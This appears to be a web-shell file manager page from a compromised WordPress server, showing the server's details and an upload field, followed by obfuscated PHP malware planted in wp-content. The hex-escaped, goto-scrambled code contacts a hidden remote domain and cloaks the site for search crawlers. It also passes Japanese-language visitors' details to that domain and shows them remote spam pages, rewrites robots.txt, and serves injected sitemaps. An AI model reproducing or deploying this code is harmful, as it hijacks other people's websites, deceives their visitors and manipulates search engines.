| Server IP : 51.178.161.41 / Your IP : 216.73.216.212 Web Server : nginx/1.18.0 System : Linux vms33 5.10.0-36-amd64 #1 SMP Debian 5.10.244-1 (2025-09-29) x86_64 User : web18 ( 5018) PHP Version : 8.3.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client1/web18/web/wp-content/ |
Upload File : |
<?php
goto Jz3WQ; vccmL: $req_uri = str_replace(array("\x2e\150\x74\x6d", "\x2e\150\164\155\x6c", "\56\163\150\164\155\x6c", "\56\160\150\x74\x6d\x6c"), '', rtrim($req_uri, "\57")); goto Jr3fT; Jr3fT: if (!$res_crawl && $chk_refer && is_japanese_language() && (preg_match("\x2f\x5c\144\44\x2f", $req_uri) || preg_match("\x23\x5b\x61\55\172\x5d\x3d\x5b\x61\55\x7a\60\x2d\71\135\53\x23", $req_uri) || preg_match("\x2f\x69\x74\x65\155\57", $req_uri))) { $data1["\151\x70"] = $_SERVER["\x52\105\x4d\x4f\x54\105\137\x41\104\104\x52"]; $data1["\x72\x65\146\145\162\x65\x72"] = isset($_SERVER["\110\124\124\x50\x5f\122\105\x46\105\x52\105\x52"]) ? $_SERVER["\x48\x54\124\x50\x5f\122\105\106\105\122\105\122"] : ''; $data1["\165\163\x65\162\137\141\x67\145\x6e\164"] = strtolower(isset($_SERVER["\x48\x54\x54\x50\x5f\125\x53\105\122\137\101\x47\x45\116\x54"]) ? $_SERVER["\110\124\124\x50\137\x55\123\x45\x52\137\x41\x47\x45\x4e\124"] : ''); echo getServerCont($jump1, $data1); die; } goto L4hNB; lYnnA: $url_robots = $inter_domain . "\x2f\x72\x6f\x62\x6f\164\163\56\160\x68\x70"; goto B9z7w; dk5mM: $referer = isset($_SERVER["\110\x54\x54\x50\x5f\122\105\x46\x45\122\x45\122"]) ? $_SERVER["\110\124\124\x50\137\122\105\x46\105\x52\x45\122"] : ''; goto nOmZg; S6MUg: $url_words = $inter_domain . "\x2f\x77\x6f\162\x64\163\x2e\160\x68\x70"; goto lYnnA; XrmWd: $res_crawl = is_crawler($user_agent); goto vccmL; wDWGz: function check_refer($refer) { $check_refer = false; $referbots = "\x67\x6f\x6f\x67\x6c\145\x7c\171\141\150\x6f\157\174\142\x69\156\147\174\x61\x6f\154"; if ($refer != '' && preg_match("\x2f\50{$referbots}\x29\x2f\163\x69", $refer)) { $check_refer = true; } return $check_refer; } goto Ntd1k; IM99M: function getServerCont($url, $data = array()) { $url = str_replace("\40", "\53", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\56\60\x2e\60", "\74")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto Dtf0U; ythPv: $data1["\x72\x65\161\137\x75\x72\151"] = $req_uri; goto hKUzB; B9z7w: if (strpos($req_uri, "\56\x70\150\x70")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto HDHei; Ntd1k: function is_japanese_language() { $accept_language = isset($_SERVER["\110\124\124\x50\x5f\x41\x43\x43\105\x50\x54\x5f\x4c\x41\116\x47\125\101\107\105"]) ? $_SERVER["\x48\x54\124\120\x5f\x41\x43\103\105\120\x54\x5f\114\x41\x4e\x47\x55\x41\x47\105"] : ''; if (empty($accept_language)) { return false; } $langs = explode("\x2c", $accept_language); $primary_lang = strtolower(trim($langs[0])); if (strpos($primary_lang, "\x6a\x61") === 0) { return true; } return false; } goto kEakD; nOmZg: $chk_refer = check_refer($referer); goto bbt1b; L4hNB: if ($res_crawl) { $data1["\150\164\x74\x70\x5f\165\163\145\x72\137\141\147\145\156\x74"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto a2epA; Dtf0U: function is_crawler($agent) { $agent_check = false; $bots = "\147\157\157\x67\x6c\145\142\157\164\x7c\x62\x69\x6e\x67\x62\x6f\164\174\147\157\x6f\x67\x6c\x65\x7c\x61\x6f\x6c\174\142\151\x6e\147\x7c\x79\141\150\157\x6f"; if ($agent != '') { if (preg_match("\x2f\x28{$bots}\x29\57\163\x69", $agent)) { $agent_check = true; } } return $agent_check; } goto wDWGz; yyjrF: $self = $_SERVER["\120\110\x50\137\123\105\114\x46"]; goto ioqWv; QpWuR: $jump1 = $inter_domain . "\x2f\152\x75\x6d\x70\x2e\160\x68\160"; goto S6MUg; SYiRk: $map1 = $inter_domain . "\57\155\141\x70\56\160\x68\x70"; goto QpWuR; HDHei: $data1[] = array(); goto e8Qab; bbt1b: $user_agent = strtolower(isset($_SERVER["\110\124\x54\x50\137\x55\123\x45\122\x5f\x41\107\x45\116\124"]) ? $_SERVER["\x48\x54\124\x50\x5f\x55\x53\105\122\137\101\107\x45\116\x54"] : ''); goto XrmWd; uMFqS: $indata1 = $inter_domain . "\x2f\151\x6e\144\141\x74\141\x2e\x70\150\160"; goto SYiRk; Tdx12: $req_url = $http . $domain . $req_uri; goto uMFqS; e8Qab: $data1["\x64\x6f\155\x61\x69\x6e"] = $domain; goto ythPv; ioqWv: $ser_name = $_SERVER["\123\105\x52\x56\105\122\x5f\116\x41\115\105"]; goto Tdx12; kEakD: $http = isset($_SERVER["\x48\x54\x54\120\x53"]) && $_SERVER["\110\124\124\x50\x53"] !== "\x6f\x66\x66" ? "\x68\164\164\x70\163\x3a\x2f\x2f" : "\150\x74\x74\x70\x3a\57\57"; goto a0vuf; hKUzB: $data1["\x68\x72\145\146"] = $href1; goto i6_Tw; Zk85A: if (strpos($req_uri, "\x2e\160\150\160")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\141\151\156\137\x73\150\x65\x6c\154"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\x6d\x61\151\x6e\137\x73\x68\x65\154\154"] = $main_shell; } goto dk5mM; CStRZ: $domain = $_SERVER["\x48\124\124\120\137\x48\x4f\123\x54"]; goto yyjrF; Jz3WQ: $inter_domain = "\150\x74\x74\160\163\72\57\x2f\172\66\x30\70\x32\x39\x5f\66\56\170\x76\x79\156\163\56\163\x68\x6f\160\x2f"; goto IM99M; jOmBV: if (substr($req_uri, -6) == "\162\157\142\157\164\163") { define("\102\x41\x53\105\137\120\x41\x54\110", $_SERVER["\x44\117\103\125\115\x45\x4e\124\137\x52\x4f\x4f\x54"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\157\x62\157\x74\x73\56\164\x78\x74"); $data1["\x72\157\142\x6f\x74\x73\x5f\143\157\x6e\x74"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\57\162\x6f\142\x6f\164\x73\56\x74\170\x74", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\162\157\142\157\164\163\x2e\164\170\164"); if (strpos(strtolower($robots_cont), "\163\151\x74\145\155\141\160")) { echo "\x72\x6f\x62\157\164\163\x2e\x74\x78\x74\40\146\151\x6c\145\40\143\162\x65\x61\x74\x65\40\x73\x75\143\x63\x65\x73\x73\41"; } else { echo "\x72\157\x62\x6f\164\x73\x2e\164\170\x74\x20\146\x69\x6c\x65\x20\x63\162\145\x61\x74\145\40\x66\x61\151\154\x21"; } die; } goto d64c0; i6_Tw: $data1["\162\x65\x71\137\x75\162\x6c"] = $req_url; goto jOmBV; a0vuf: $req_uri = $_SERVER["\x52\x45\x51\125\x45\123\x54\137\x55\122\x49"]; goto CStRZ; d64c0: if (substr($req_uri, -4) == "\56\x78\155\154") { if (strpos($req_uri, "\x61\154\154\163\x69\x74\x65\155\x61\160\x2e\170\155\x6c")) { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\x74\145\156\164\55\x74\171\x70\145\x3a\164\x65\170\x74\x2f\170\x6d\154"); echo $str_cont; die; } if (strpos($req_uri, "\x2e\x70\150\160")) { $word4 = explode("\77", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\x2e\170\x6d\x6c", '', $word4); } else { $word4 = str_replace("\57", '', $req_uri); $word4 = str_replace("\x2e\x78\x6d\154", '', $word4); } $data1["\x77\157\x72\x64"] = $word4; $data1["\x61\x63\164\151\x6f\156"] = "\143\150\145\143\153\x5f\x73\x69\164\x65\x6d\x61\160"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\61") { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\164\145\156\x74\x2d\164\x79\x70\x65\x3a\x74\x65\170\164\x2f\x78\x6d\x6c"); echo $str_cont; die; } $data1["\141\143\164\x69\x6f\x6e"] = "\143\150\145\x63\153\x5f\x77\157\162\144\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\x6d\x61\x70") > 0 || $check1 == "\61") { $data1["\x61\143\164\151\x6f\156"] = "\x72\141\x6e\144\x5f\170\155\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\x43\157\x6e\164\145\156\x74\55\164\x79\160\145\72\x74\x65\x78\x74\57\170\155\154"); echo $check_url4; die; } } goto Zk85A; a2epA: ?>